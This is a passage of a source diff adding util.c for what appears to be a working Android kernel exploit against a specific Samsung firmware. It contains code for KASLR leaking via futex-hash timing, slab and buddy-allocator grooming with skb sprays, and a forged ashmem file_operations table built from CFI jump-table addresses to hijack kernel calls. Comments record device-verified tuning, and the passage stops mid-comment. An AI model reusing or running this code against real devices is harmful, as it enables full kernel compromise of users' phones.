--- a/src/targets/S901USQU2BVK1/util.c
+++ b/src/targets/S901USQU2BVK1/util.c
@@ -1,0 +1,1654 @@
+#include "common.h"
+#include "kernelsnitch/kernelsnitch.h"
+
+FILE *g_logfile = NULL;
+
+static page_reclaim_trace_fn g_reclaim_trace_begin;
+static page_reclaim_trace_fn g_reclaim_trace_end;
+
+void set_page_reclaim_trace_hooks(page_reclaim_trace_fn begin,
+                                  page_reclaim_trace_fn end) {
+  g_reclaim_trace_begin = begin;
+  g_reclaim_trace_end = end;
+}
+
+void page_reclaim_trace_begin(void) {
+  if (g_reclaim_trace_begin)
+    g_reclaim_trace_begin();
+}
+
+void page_reclaim_trace_end(void) {
+  if (g_reclaim_trace_end)
+    g_reclaim_trace_end();
+}
+
+int last_skb_reclaim_sent;
+int last_skb_reclaim_want;
+size_t last_skb_send_size;
+uintptr_t last_leaked_mm;
+
+static struct kernelsnitch_shared_state *ks;
+static size_t mm_objs_per_slab;
+static unsigned char *skb_buf;
+
+static int env_int_range(const char *name, int def, int min, int max) {
+  const char *arg = getenv(name);
+  char *end = NULL;
+  long value;
+
+  if (!arg || !*arg) {
+    return def;
+  }
+  errno = 0;
+  value = strtol(arg, &end, 0);
+  if (errno || !end || *end || value < min || value > max) {
+    pr_warning("bad %s value=%s; using %d\n", name, arg, def);
+    return def;
+  }
+  return (int)value;
+}
+
+static size_t skb_send_bytes(void) {
+  int kb = env_int_range("SKB_SEND_KB", (int)(SKB_SEND_SIZE / 1024), 32, 64);
+  return (size_t)kb * 1024U;
+}
+
+static int env_flag(const char *name, int def) {
+  const char *arg = getenv(name);
+  if (!arg || !*arg)
+    return def;
+  return strcmp(arg, "0") != 0;
+}
+
+/* Match oppo-ghostlock exploit/src/util.c reclaim teardown when set. */
+static int use_oppo_reclaim_teardown(void) {
+  return env_flag("OPPO_RECLAIM_TEARDOWN", 0);
+}
+
+static int use_skb_flush_mm_partial(void) {
+  return env_flag("SKB_FLUSH_MM_PARTIAL", 0);
+}
+
+/* Oppo keeps post_ctx[last] open to pin one mm on the slab; close it for
+ * QEMU reclaim testing (not used by the real oppo-ghostlock exploit). */
+static int use_skb_close_last_mm(void) {
+  return env_flag("SKB_CLOSE_LAST_MM", 0);
+}
+
+/* Reclaim pairs are batched and NEVER closed between prepares: a failed
+ * round can leave misc.fops pointing at an older payload page, and as long
+ * as that page's payload skb stays queued, its fake table (valid JT
+ * .open/.release) keeps any later misc_open/close dispatch harmless.
+ * Freeing it lets the page recycle into live mm_structs whose junk
+ * .open/.release is a wild branch (die@misc_open / die@filp_close,
+ * GDB-verified 2026-08-07).  Batches form a ring; the batch being reused
+ * is closed only on wraparound. */
+#define SKB_RECLAIM_BATCHES 64
+static int reclaim_sv[SKB_RECLAIM_BATCHES][SKB_RECLAIM_PAIRS][2];
+static int reclaim_sv_inited;
+static int reclaim_batch_cnt;
+static int rb_cur;
+
+static void reclaim_batch_close(int b) {
+  for (int p = 0; p < SKB_RECLAIM_PAIRS; p++) {
+    for (int i = 0; i < 2; i++) {
+      if (reclaim_sv[b][p][i] >= 0) {
+        close(reclaim_sv[b][p][i]);
+        reclaim_sv[b][p][i] = -1;
+      }
+    }
+  }
+}
+
+static int reclaim_batch_next(void) {
+  int b = reclaim_batch_cnt % SKB_RECLAIM_BATCHES;
+  if (reclaim_batch_cnt >= SKB_RECLAIM_BATCHES)
+    reclaim_batch_close(b);
+  reclaim_batch_cnt++;
+  rb_cur = b;
+  return b;
+}
+
+static void init_reclaim_sv(void) {
+  if (!reclaim_sv_inited) {
+    for (int b = 0; b < SKB_RECLAIM_BATCHES; b++) {
+      for (int p = 0; p < SKB_RECLAIM_PAIRS; p++) {
+        reclaim_sv[b][p][0] = -1;
+        reclaim_sv[b][p][1] = -1;
+      }
+    }
+    reclaim_sv_inited = 1;
+  }
+}
+static struct mm_ctx prepare_ctx;
+static struct mm_ctx spray_ctx;
+static struct mm_ctx pre_ctx;
+static struct mm_ctx post_ctx;
+static pid_t child_leak;
+
+static void log_mm_slabinfo(const char *stage) {
+  FILE *fp = fopen("/proc/slabinfo", "r");
+  if (!fp) {
+    return;
+  }
+
+  char line[256];
+  while (fgets(line, sizeof(line), fp)) {
+    if (strncmp(line, "mm_struct ", 10) == 0) {
+      pr_info("mm slabinfo %s %s", stage, line);
+      break;
+    }
+  }
+  fclose(fp);
+}
+
+uintptr_t page_base;
+uintptr_t fake_lock;
+uintptr_t fake_w0;
+uintptr_t fake_task;
+uintptr_t fake_parent;
+uintptr_t fake_right;
+uintptr_t fake_left;
+uintptr_t fake_fops;
+uintptr_t binwrite_target;
+uintptr_t slide_p0_offset;
+char ashmem_path[256] = "/dev/ashmem";
+
+void setup_kernelsnitch(void) {
+  int cpu_count = (int)sysconf(_SC_NPROCESSORS_ONLN);
+  ks = kernelsnitch_setup(
+      MM_STRUCT_SZ, MM_ORDER, cpu_count, KSNITCH_COLLISIONS, 0, 0);
+}
+
+int kernelsnitch_collisions_ready(void) {
+  return kernelsnitch_found_collisions(ks);
+}
+
+void run_kernelsnitch_bruteforce(void) {
+  kernelsnitch_bruteforce(ks);
+}
+
+uintptr_t cleanup_kernelsnitch(void) {
+  uintptr_t leaked = kernelsnitch_cleanup(ks);
+  ks = NULL;
+  return leaked;
+}
+
+void read_first_line(const char *path, char *buf, size_t len) {
+  if (!len) {
+    return;
+  }
+  snprintf(buf, len, "unreadable");
+  int fd = open(path, O_RDONLY | O_CLOEXEC);
+  if (fd < 0) {
+    return;
+  }
+  ssize_t n = read(fd, buf, len - 1);
+  int saved_errno = errno;
+  close(fd);
+  if (n <= 0) {
+    errno = saved_errno;
+    snprintf(buf, len, "unreadable");
+    return;
+  }
+  buf[n] = 0;
+  buf[strcspn(buf, "\r\n")] = 0;
+}
+
+void log_startup_context(void) {
+  char attr[256];
+  char enforce[32];
+  char status[4096];
+  char limits[160] = "NoNewPrivs=? Seccomp=? Seccomp_filters=?";
+  read_first_line("/proc/self/attr/current", attr, sizeof(attr));
+  read_first_line("/sys/fs/selinux/enforce", enforce, sizeof(enforce));
+  int fd = open("/proc/self/status", O_RDONLY | O_CLOEXEC);
+  if (fd >= 0) {
+    ssize_t n = read(fd, status, sizeof(status) - 1);
+    close(fd);
+    if (n > 0) {
+      status[n] = 0;
+      const char *names[] = {"NoNewPrivs:", "Seccomp:", "Seccomp_filters:"};
+      char values[3][32] = {"?", "?", "?"};
+      for (size_t i = 0; i < 3; i++) {
+        char *p = strstr(status, names[i]);
+        if (p) {
+          p += strlen(names[i]);
+          while (*p == '\t' || *p == ' ') {
+            p++;
+          }
+          size_t len = strcspn(p, "\r\n");
+          if (len >= sizeof(values[i])) {
+            len = sizeof(values[i]) - 1;
+          }
+          memcpy(values[i], p, len);
+          values[i][len] = 0;
+        }
+      }
+      snprintf(limits, sizeof(limits), "NoNewPrivs=%s Seccomp=%s "
+               "Seccomp_filters=%s", values[0], values[1], values[2]);
+    }
+  }
+  pr_success("startup context pid=%d uid=%u euid=%u gid=%u egid=%u attr=%s enforce=%s\n",
+             getpid(), getuid(), geteuid(), getgid(), getegid(), attr,
+             enforce);
+  pr_success("startup limits pid=%d %s\n", getpid(), limits);
+  pr_success("build config pid=%d label=%s slide=pselect main=exp64\n",
+             getpid(), BUILD_VARIANT_LABEL);
+  pr_success("p0 profile pid=%d phys_offset=%016llx kernel_phys_load=%016llx "
+             "delta=%016llx slide_logger=%016llx bootid_data=%016llx "
+             "init_task=%016llx root_tg=%016llx sysctl_bootid=%016llx\n",
+             getpid(), (unsigned long long)P0_PHYS_OFFSET,
+             (unsigned long long)P0_KERNEL_PHYS_LOAD,
+             (unsigned long long)P0_KERNEL_PHYS_DELTA,
+             (unsigned long long)SLIDE_NFULNL_LOGGER,
+             (unsigned long long)SLIDE_RANDOM_BOOT_ID_DATA,
+             (unsigned long long)SLIDE_INIT_TASK,
+             (unsigned long long)SLIDE_ROOT_TASK_GROUP,
+             (unsigned long long)SLIDE_SYSCTL_BOOTID);
+}
+
+void disable_rseq_for_thread(void) {
+  return;
+}
+
+long futex_op(uint32_t *uaddr, int op, uint32_t val,
+              const struct timespec *timeout, uint32_t *uaddr2,
+              uint32_t val3) {
+  return syscall(SYS_futex, uaddr, op, val, timeout, uaddr2, val3);
+}
+
+long sched_setattr_tid(int tid, int nice_value) {
+  struct local_sched_attr attr;
+  memset(&attr, 0, sizeof(attr));
+  attr.size = sizeof(attr);
+  attr.sched_policy = SCHED_BATCH;
+  attr.sched_nice = nice_value;
+  return syscall(SYS_sched_setattr, tid, &attr, 0);
+}
+
+int try_cache_ashmem_path(const char *path) {
+  int fd = open(path, O_RDWR | O_CLOEXEC);
+  if (fd < 0) {
+    return 0;
+  }
+
+  close(fd);
+  snprintf(ashmem_path, sizeof(ashmem_path), "%s", path);
+  return 1;
+}
+
+int same_rdev_path(const char *path, dev_t rdev) {
+  struct stat st;
+  if (stat(path, &st) != 0) {
+    return 0;
+  }
+  return S_ISCHR(st.st_mode) && st.st_rdev == rdev;
+}
+
+void init_ashmem_path(void) {
+  char boot_id[128];
+  int fd = open("/proc/sys/kernel/random/boot_id", O_RDONLY | O_CLOEXEC);
+  if (fd >= 0) {
+    ssize_t n = read(fd, boot_id, sizeof(boot_id) - 1);
+    close(fd);
+    if (n > 0) {
+      boot_id[n] = 0;
+      boot_id[strcspn(boot_id, "\r\n")] = 0;
+
+      char path[256];
+      snprintf(path, sizeof(path), "/dev/ashmem%s", boot_id);
+      if (try_cache_ashmem_path(path)) {
+        return;
+      }
+    }
+  }
+
+  struct stat base;
+  int have_base = stat("/dev/ashmem", &base) == 0;
+  have_base = have_base && S_ISCHR(base.st_mode);
+  DIR *dir = opendir("/dev");
+  if (dir && have_base) {
+    struct dirent *de;
+    while ((de = readdir(dir)) != NULL) {
+      if (strncmp(de->d_name, "ashmem", 6) != 0 ||
+          strcmp(de->d_name, "ashmem") == 0) {
+        continue;
+      }
+
+      char path[256];
+      snprintf(path, sizeof(path), "/dev/%s", de->d_name);
+      if (same_rdev_path(path, base.st_rdev) &&
+          try_cache_ashmem_path(path)) {
+        closedir(dir);
+        return;
+      }
+    }
+  }
+  if (dir) {
+    closedir(dir);
+  }
+}
+
+int open_ashmem_device(void) {
+  return SYSCHK(open(ashmem_path, O_RDWR | O_CLOEXEC));
+}
+
+uintptr_t p0_data_alias(uintptr_t image_addr) {
+  uintptr_t off = image_addr - KIMAGE_TEXT_BASE;
+  uintptr_t phys = P0_KERNEL_PHYS_LOAD + off;
+  return ((phys - P0_PHYS_OFFSET) | P0_PAGE_OFFSET);
+}
+
+uintptr_t p0_alias_image_offset(uintptr_t data_alias) {
+  return (data_alias - P0_PAGE_OFFSET) - P0_KERNEL_PHYS_DELTA;
+}
+
+uintptr_t data_addr(uintptr_t image_addr) {
+  return p0_data_alias(image_addr) + slide_p0_offset;
+}
+
+uintptr_t kaslr_image_addr(uintptr_t image_addr) {
+  if (!kaslr_done) {
+    return image_addr;
+  }
+  return kaslr_base + (image_addr - KIMAGE_TEXT_BASE);
+}
+
+uintptr_t text_addr(uintptr_t image_addr) {
+  return kaslr_image_addr(image_addr);
+}
+
+uintptr_t slide_canon_addr(uintptr_t data_alias) {
+  return kaslr_base + p0_alias_image_offset(data_alias);
+}
+
+uintptr_t canon_addr(uintptr_t image_addr) {
+  return text_addr(image_addr);
+}
+
+void put64(unsigned char *p, size_t off, uint64_t value) {
+  memcpy(p + off, &value, sizeof(value));
+}
+
+void put32(unsigned char *p, size_t off, uint32_t value) {
+  memcpy(p + off, &value, sizeof(value));
+}
+
+void put_fake_fops_table(unsigned char *p, size_t off) {
+  /* CONFIG_CFI_CLANG: every function pointer in the table MUST be the
+   * canonical .cfi_jt jump-table entry — raw kallsyms addresses make the
+   * first indirect call (misc_open -> f_op->open) panic with
+   * "CFI failure" (observed on the live target).  Layout mimics the real
+   * ashmem_fops: owner NULL, .splice_read NULL, real ashmem_llseek.
+   * The table is never traversed as an rb node (rb_erase/rb_next only
+   * touch the fake waiter's own links), so live pointers are safe. */
+  put64(p, off + FOPS_OWNER_OFF, 0);
+  put64(p, off + FOPS_LLSEEK_OFF, text_addr(ASHMEM_LLSEEK_JT));
+  put64(p, off + FOPS_READ_OFF, text_addr(CONFIGFS_READ_FILE_JT));
+  put64(p, off + FOPS_WRITE_OFF, text_addr(CONFIGFS_WRITE_BIN_FILE_JT));
+  put64(p, off + FOPS_READ_ITER_OFF, 0);
+  put64(p, off + FOPS_WRITE_ITER_OFF, 0);
+  put64(p, off + FOPS_IOCTL_OFF, text_addr(ASHMEM_IOCTL_JT));
+  put64(p, off + FOPS_COMPAT_IOCTL_OFF, text_addr(ASHMEM_COMPAT_IOCTL_JT));
+  put64(p, off + FOPS_MMAP_OFF, text_addr(ASHMEM_MMAP_JT));
+  put64(p, off + FOPS_OPEN_OFF, text_addr(ASHMEM_OPEN_JT));
+  put64(p, off + FOPS_RELEASE_OFF, text_addr(ASHMEM_RELEASE_JT));
+  put64(p, off + FOPS_SPLICE_READ_OFF, 0);
+  put64(p, off + FOPS_SHOW_FDINFO_OFF, text_addr(ASHMEM_SHOW_FDINFO_JT));
+}
+
+int try_put_blob_no_zeros(int fd, const unsigned char *blob, size_t len) {
+  char name[ASHMEM_NAME_LEN];
+  memset(name, 0x41, sizeof(name));
+
+  for (size_t i = 0; i < len; i++) {
+    name[i] = blob[i] ? blob[i] : 1;
+  }
+  name[len] = 0;
+  return ioctl(fd, ASHMEM_SET_NAME, name);
+}
+
+int try_put_blob_zero_at(int fd, const unsigned char *blob, size_t pos) {
+  char name[ASHMEM_NAME_LEN];
+  memset(name, 0x41, sizeof(name));
+
+  for (size_t i = 0; i < pos; i++) {
+    name[i] = blob[i] ? blob[i] : 1;
+  }
+  name[pos] = 0;
+  return ioctl(fd, ASHMEM_SET_NAME, name);
+}
+
+int try_set_ashmem_name_blob(int fd, const unsigned char *blob, size_t len) {
+  if (try_put_blob_no_zeros(fd, blob, len) != 0) {
+    return -1;
+  }
+
+  for (size_t i = len; i > 0; i--) {
+    if (blob[i - 1] == 0 &&
+        try_put_blob_zero_at(fd, blob, i - 1) != 0) {
+      return -1;
+    }
+  }
+  return 0;
+}
+
+pid_t clone_child(void) {
+  pid_t child = SYSCHK(syscall(SYS_clone, SIGCHLD, NULL, NULL, NULL, 0));
+  if (child == 0) {
+    SYSCHK(prctl(PR_SET_PDEATHSIG, SIGKILL));
+    if (getppid() == 1) {
+      _exit(0);
+    }
+    pin_to_core(CORE);
+    for (;;) {
+      pause();
+    }
+  }
+  return child;
+}
+
+pid_t clone_leak_child(void) {
+  pid_t child = SYSCHK(syscall(SYS_clone, SIGCHLD, NULL, NULL, NULL, 0));
+  if (child == 0) {
+    kernelsnitch_find_collisions(ks);
+    exit(0);
+  }
+  return child;
+}
+
+int open_memfd(pid_t child) {
+  char path[64];
+  snprintf(path, sizeof(path), "/proc/%d/mem", child);
+  return SYSCHK(open(path, O_RDONLY));
+}
+
+void kill_child(pid_t child) {
+  if (child <= 0) {
+    return;
+  }
+  SYSCHK(kill(child, SIGKILL));
+  SYSCHK(waitpid(child, NULL, 0));
+}
+
+void close_reclaim_sockets(void) {
+  init_reclaim_sv();   /* zero-init guard: never close() fd 0 by accident */
+  for (int b = 0; b < SKB_RECLAIM_BATCHES; b++)
+    reclaim_batch_close(b);
+}
+
+void close_ctx_memfds(struct mm_ctx *ctx) {
+  for (size_t i = 0; i < ctx->mm_cnt; i++) {
+    if (ctx->memfds[i] > 0) {
+      close(ctx->memfds[i]);
+      ctx->memfds[i] = -1;
+    }
+  }
+}
+
+void free_ctx_storage(struct mm_ctx *ctx) {
+  free(ctx->childs);
+  free(ctx->memfds);
+  ctx->childs = NULL;
+  ctx->memfds = NULL;
+  ctx->mm_cnt = 0;
+}
+
+static void order3_hold_end(void);
+
+void cleanup_page_prepare_state(void) {
+  order3_hold_end();
+  close_ctx_memfds(&prepare_ctx);
+  close_ctx_memfds(&spray_ctx);
+  close_ctx_memfds(&pre_ctx);
+  close_ctx_memfds(&post_ctx);
+  if (memfd_leak > 0) {
+    close(memfd_leak);
+    memfd_leak = -1;
+  }
+  free_ctx_storage(&prepare_ctx);
+  free_ctx_storage(&spray_ctx);
+  free_ctx_storage(&pre_ctx);
+  free_ctx_storage(&post_ctx);
+  free(skb_buf);
+  skb_buf = NULL;
+}
+
+int clone_memfd(void) {
+  pid_t child = clone_child();
+  int fd = open_memfd(child);
+  kill_child(child);
+  return fd;
+}
+
+#ifndef MM_CPU_PARTIAL
+#define MM_CPU_PARTIAL 13
+#endif
+
+/* ---- page-content verification ----------------------------------------
+ * verify_fops_on_page() wants to read 4 qwords off the reclaimed kernel
+ * page before the dangerous /dev/ashmem open.  /dev/mem never exists on a
+ * real device (and is disabled on the s22 kernel: CONFIG_DEVMEM=n), so it
+ * is not used at all.  There is NO unprivileged pre-hijack kernel-memory
+ * read: adb-verified on b0q that uid=2000 shell (even with the
+ * readtracefs group) gets EACCES writing tracefs kprobe_events, and
+ * kernelsnitch only leaks addresses via futex-hash timing.
+ *
+ * The tracefs kprobe backend below therefore only engages in the QEMU
+ * test VM (root): a kprobe event fetches arbitrary kernel memory into the
+ * trace buffer (offsets from _text are parsed with kstrtol, so direct-map
+ * targets are reachable).  Everywhere else the verify is skipped and the
+ * flow proceeds unverified — the upstream device behaviour, relying on
+ * reclaim determinism and the downstream cfi-stage checks.
+ */
+
+#define VERIFY_TRACEFS_ROOT "/sys/kernel/tracing"
+#define VERIFY_KPROBE_NAME  "cvekv"
+
+static int verify_tracefs_write(const char *path, const char *value) {
+  int fd = open(path, O_WRONLY | O_CLOEXEC);
+  if (fd < 0)
+    return 0;
+  size_t len = strlen(value);
+  ssize_t wrote = write(fd, value, len);
+  close(fd);
+  return wrote == (ssize_t)len;
+}
+
+static int kprobe_verify_state = -1;   /* -1 untried, 0 unavailable, 1 ready */
+static char kprobe_verify_func[64];
+
+static int kprobe_verify_init(void) {
+  if (kprobe_verify_state >= 0)
+    return kprobe_verify_state;
+  kprobe_verify_state = 0;
+  static const char *funcs[] = {
+    "__arm64_sys_getuid",
+    "__arm64_sys_getpid",
+    "__arm64_sys_gettid",
+  };
+  for (size_t i = 0; i < sizeof(funcs) / sizeof(funcs[0]); i++) {
+    char cmd[256];
+    char enpath[192];
+    /* drop any stale event, then try a probe read of _text itself */
+    verify_tracefs_write(
+        VERIFY_TRACEFS_ROOT "/kprobe_events", "-:" VERIFY_KPROBE_NAME);
+    snprintf(cmd, sizeof(cmd),
+             "p:" VERIFY_KPROBE_NAME " %s @_text+0:x64", funcs[i]);
+    if (!verify_tracefs_write(VERIFY_TRACEFS_ROOT "/kprobe_events", cmd))
+      continue;
+    snprintf(enpath, sizeof(enpath),
+             VERIFY_TRACEFS_ROOT "/events/kprobes/" VERIFY_KPROBE_NAME
+             "/enable");
+    int ok = verify_tracefs_write(enpath, "1");
+    if (ok)
+      verify_tracefs_write(enpath, "0");
+    verify_tracefs_write(
+        VERIFY_TRACEFS_ROOT "/kprobe_events", "-:" VERIFY_KPROBE_NAME);
+    if (ok) {
+      snprintf(kprobe_verify_func, sizeof(kprobe_verify_func),
+               "%s", funcs[i]);
+      kprobe_verify_state = 1;
+      break;
+    }
+  }
+  return kprobe_verify_state;
+}
+
+static void kprobe_verify_delete(void) {
+  char enpath[192];
+  snprintf(enpath, sizeof(enpath),
+           VERIFY_TRACEFS_ROOT "/events/kprobes/" VERIFY_KPROBE_NAME
+           "/enable");
+  verify_tracefs_write(enpath, "0");
+  verify_tracefs_write(
+      VERIFY_TRACEFS_ROOT "/kprobe_events", "-:" VERIFY_KPROBE_NAME);
+}
+
+/* Read kv[0..3] (direct-map KVAs) via one kprobe event fired by getuid(). */
+static int kprobe_read_quad(const uintptr_t kv[4], uint64_t out[4]) {
+  if (!kprobe_verify_init())
+    return 0;
+  uintptr_t text = KIMAGE_TEXT_BASE + kaslr_slide;
+  char cmd[768];
+  char enpath[192];
+  snprintf(enpath, sizeof(enpath),
+           VERIFY_TRACEFS_ROOT "/events/kprobes/" VERIFY_KPROBE_NAME
+           "/enable");
+  verify_tracefs_write(
+      VERIFY_TRACEFS_ROOT "/kprobe_events", "-:" VERIFY_KPROBE_NAME);
+  snprintf(cmd, sizeof(cmd),
+           "p:" VERIFY_KPROBE_NAME " %s "
+           "@_text%+lld:x64 @_text%+lld:x64 @_text%+lld:x64 @_text%+lld:x64",
+           kprobe_verify_func,
+           (long long)((long)kv[0] - (long)text),
+           (long long)((long)kv[1] - (long)text),
+           (long long)((long)kv[2] - (long)text),
+           (long long)((long)kv[3] - (long)text));
+  if (!verify_tracefs_write(VERIFY_TRACEFS_ROOT "/kprobe_events", cmd))
+    return 0;
+  if (!verify_tracefs_write(enpath, "1"))
+    goto fail;
+  /* clear the ring buffer, then fire the probe */
+  int tfd = open(VERIFY_TRACEFS_ROOT "/trace", O_WRONLY | O_TRUNC | O_CLOEXEC);
+  if (tfd >= 0)
+    close(tfd);
+  (void)getuid();
+  (void)getuid();
+  kprobe_verify_delete();
+
+  int fd = open(VERIFY_TRACEFS_ROOT "/trace", O_RDONLY | O_CLOEXEC);
+  if (fd < 0)
+    return 0;
+  static char buf[32768];
+  ssize_t n = read(fd, buf, sizeof(buf) - 1);
+  close(fd);
+  if (n <= 0)
+    return 0;
+  buf[n] = 0;
+  /* take the last matching record (ours) */
+  char *rec = NULL;
+  for (char *q = buf; (q = strstr(q, VERIFY_KPROBE_NAME ":")); )
+    rec = q++;
+  if (!rec)
+    return 0;
+  char *args = strstr(rec, "arg1=");
+  unsigned long long v[4];
+  if (!args ||
+      sscanf(args, "arg1=0x%llx arg2=0x%llx arg3=0x%llx arg4=0x%llx",
+             &v[0], &v[1], &v[2], &v[3]) != 4)
+    return 0;
+  for (int i = 0; i < 4; i++)
+    out[i] = (uint64_t)v[i];
+  return 1;
+fail:
+  kprobe_verify_delete();
+  return 0;
+}
+
+/* ---- TEMPORARY leak-slab tracking (QEMU diagnosis; remove after fix) ----
+ * Reads the leak slab's struct page + mm_cachep node state via the tracefs
+ * kprobe backend (root in the test VM) at each reclaim stage, to pin where
+ * the slab actually sits: cpu_slab fast path vs frozen vs node-partial vs
+ * buddy.  Gate with RECLAIM_MM_TRACK=0 to silence. */
+static int use_mm_track(void) {
+  /* Default OFF: every call opens a tracefs file, whose zeroed order-3
+   * kmalloc steals the just-discarded leak page from free_area[3] before
+   * the reclaim sends can capture it (GDB-verified 2026-08-07: write
+   * watchpoint on the discarded page -> clear_page <- kernel_init_free_pages
+   * <- kmalloc_order <- tracing_open <- do_sys_openat2, every attempt).
+   * The kprobe backend is unavailable on b0q anyway ("kprobe read failed"),
+   * so the calls only burned pages. */
+  return env_flag("RECLAIM_MM_TRACK", 0);
+}
+
+#define MMTRACK_CACHEP 0xffffff8780002600ULL /* QEMU nokaslr mm_cachep (GDB) */
+
+static void track_mm_page(uintptr_t base, const char *stage) {
+  if (!use_mm_track())
+    return;
+  uintptr_t pfn = (base - DIRECT_MAP_BASE + P0_PHYS_OFFSET) >> PAGE_SHIFT;
+  uintptr_t page = VMEMMAP_START + pfn * STRUCT_PAGE_SIZE;
+  uintptr_t kv[4] = {
+      page + 0x18,            /* page->slab_cache */
+      page + 0x28,            /* page->counters */
+      page + 0x08,            /* page->lru/next */
+      MMTRACK_CACHEP + 0x100, /* mm_cachep->node[0] */
+  };
+  uint64_t out[4] = {0, 0, 0, 0};
+  if (!kprobe_read_quad(kv, out)) {
+    pr_info("mmtrack %s base=%016zx page=%016zx: kprobe read failed\n",
+            stage, base, page);
+    return;
+  }
+  uint32_t counters = (uint32_t)out[1];
+  unsigned long long nr_partial = 0;
+  if (out[3]) {
+    uintptr_t kv2[4] = {(uintptr_t)out[3] + 0x08, page, page, page};
+    uint64_t out2[4] = {0, 0, 0, 0};
+    if (kprobe_read_quad(kv2, out2))
+      nr_partial = (unsigned long long)out2[0];
+  }
+  pr_info("mmtrack %s base=%016zx page=%016zx slab_cache=%016zx "
+          "counters=%08x inuse=%u frozen=%u lru=%016zx node=%016zx "
+          "nr_partial=%llu\n",
+          stage, base, page, (uintptr_t)out[0], counters,
+          counters & 0xffff, (counters >> 31) & 1, (uintptr_t)out[2],
+          (uintptr_t)out[3], nr_partial);
+}
+
+static int verify_fops_on_page(uintptr_t base) {
+  uintptr_t read_kva = base + SKB_DATA_DELTA + FOPS_TABLE_OFF + FOPS_READ_OFF;
+  uintptr_t kv[4] = {
+    read_kva,
+    read_kva + (FOPS_WRITE_OFF - FOPS_READ_OFF),
+    read_kva + (FOPS_IOCTL_OFF - FOPS_READ_OFF),
+    base + SKB_DATA_DELTA + W0_OFF,
+  };
+  uint64_t out[4];
+  if (!kprobe_read_quad(kv, out)) {
+    static int verify_skip_warned;
+    if (!verify_skip_warned) {
+      verify_skip_warned = 1;
+      pr_warning("page verify: tracefs kprobe unavailable; "
+                 "proceeding unverified\n");
+    }
+    return 1;   /* no backend: proceed unverified (device flow) */
+  }
+  /* fops slots hold kCFI .cfi_jt canonical addresses (see put_fake_fops_table) */
+  if (out[0] != text_addr(CONFIGFS_READ_FILE_JT))
+    return 0;
+  if (out[1] != text_addr(CONFIGFS_WRITE_BIN_FILE_JT))
+    return 0;
+  if (out[2] != text_addr(ASHMEM_IOCTL_JT))
+    return 0;
+  if (out[3] != 1)
+    return 0;
+  return 1;
+}
+
+int verify_reclaimed_kernel_page(uintptr_t base) {
+  uintptr_t read_kva = base + SKB_DATA_DELTA + FOPS_TABLE_OFF + FOPS_READ_OFF;
+  uintptr_t kv[4] = {
+    base + SKB_DATA_DELTA + W0_OFF,
+    read_kva,
+    read_kva + (FOPS_WRITE_OFF - FOPS_READ_OFF),
+    read_kva + (FOPS_IOCTL_OFF - FOPS_READ_OFF),
+  };
+  uint64_t out[4];
+  if (!kprobe_read_quad(kv, out))
+    return 1;   /* no backend: proceed unverified (device flow) */
+  if (out[0] != 1)
+    return 0;
+  if (out[1] != text_addr(CONFIGFS_READ_FILE_JT))
+    return 0;
+  if (out[2] != text_addr(CONFIGFS_WRITE_BIN_FILE_JT))
+    return 0;
+  if (out[3] != text_addr(ASHMEM_IOCTL_JT))
+    return 0;
+  return 1;
+}
+
+/* Free enough mm_structs on this CPU to flush SLUB cpu_partial and run
+ * discard_slab() on slabs queued there (including the emptied leak slab). */
+static void flush_mm_cpu_partial(void) {
+  enum { N = MM_CPU_PARTIAL + 2 };
+  int fds[N];
+  size_t n = 0;
+
+  for (; n < N; n++) {
+    fds[n] = clone_memfd();
+    if (fds[n] < 0)
+      break;
+  }
+  for (size_t i = 0; i < n; i++)
+    SYSCHK(close(fds[i]));
+  sched_yield();
+  sched_yield();
+}
+
+/* Top up the order-0 buddy free lists + PCPs right before the leak slab is
+ * discarded.  GDB-verified on b0q: without this, the freshly discarded
+ * order-3 leak page is split by an order-0 PCP refill (rmqueue_bulk) within
+ * the drain->send window and handed out as PTE/anon pages (largely to our
+ * own fork churn), so the skb frags never reclaim it.  Faulting in and
+ * freeing a scratch region leaves plenty of order-0 pages behind, so no
+ * allocation needs to split the leak page before the skb send grabs it. */
+static void prefill_order0_buddy(void) {
+  size_t len = (size_t)env_int_range("RECLAIM_ORDER0_MB", 16, 1, 256) << 20;
+  unsigned char *p = mmap(NULL, len, PROT_READ | PROT_WRITE,
+                          MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+  if (p == MAP_FAILED)
+    return;
+  for (size_t off = 0; off < len; off += PAGE_SIZE)
+    p[off] = 0;
+  munmap(p, len);
+}
+
+/* Persistent-during-prepare pile of order-3 skb frag pages used to ABSORB
+ * free_area[3] (zone Normal, where the leak pages live) down to near-empty
+ * before the leak page discards.  b0q inserts freed pages at the TAIL of
+ * free_area[3][UNMOVABLE] (SHUFFLE_PAGE_ALLOCATOR) while the reclaim sends
+ * take from the HEAD, and the exploit's own mm-spray churn keeps the list
+ * hundreds of entries long (GDB 2026-08-07: free_area[3] nr_free=1066 in
+ * zone Normal), so without the absorb the discarded leak page never
+ * reaches the head and is never captured.  The pile is released by
+ * order3_hold_end() AFTER the reclaim sends (the capture is secured by
+ * then); failure paths release it via cleanup_page_prepare_state(). */
+#define ORDER3_HOLD_PAIRS_MAX 768
+static int order3_hold_sv[ORDER3_HOLD_PAIRS_MAX][2];
+static int order3_hold_pairs;
+static int order3_hold_inited;
+
+/* /proc/buddyinfo has no per-migrate-type split; order-3 totals are good
+ * enough (the absorb also steals the other types via rmqueue fallback). */
+static long buddyinfo_order3_free(void) {
+  FILE *fp = fopen("/proc/buddyinfo", "r");
+  if (!fp)
+    return -1;
+  char line[512];
+  long fallback = -1, normal = -1;
+  while (fgets(line, sizeof(line), fp)) {
+    char *p = strstr(line, "zone");
+    if (!p)
+      continue;
+    char name[32];
+    unsigned long c0, c1, c2, c3;
+    if (sscanf(p + 4, "%31s %lu %lu %lu %lu", name, &c0, &c1, &c2, &c3) != 5)
+      continue;
+    if ((long)c3 > fallback)
+      fallback = (long)c3;
+    if (!strcmp(name, "Normal"))
+      normal = (long)c3;
+  }
+  fclose(fp);
+  return normal >= 0 ? normal : fallback;
+}
+
+static void order3_hold_begin(const struct msghdr *msg) {
+  long target = env_int_range("RECLAIM_ABSORB_TARGET", 0, 0, 64);
+  long max_pages = env_int_range("RECLAIM_ABSORB_MAX_PAGES", 4096, 0, 65536);
+  long free3 = buddyinfo_order3_free();
+  long before = free3;
+  long pages = 0;
+  int skbs = 0;
+
+  if (!order3_hold_inited) {
+    for (int p = 0; p < ORDER3_HOLD_PAIRS_MAX; p++) {
+      order3_hold_sv[p][0] = -1;
+      order3_hold_sv[p][1] = -1;
+    }
+    order3_hold_inited = 1;
+  }
+
+  /* Top the pile up until the order-3 list reads near-empty.  wmem_max
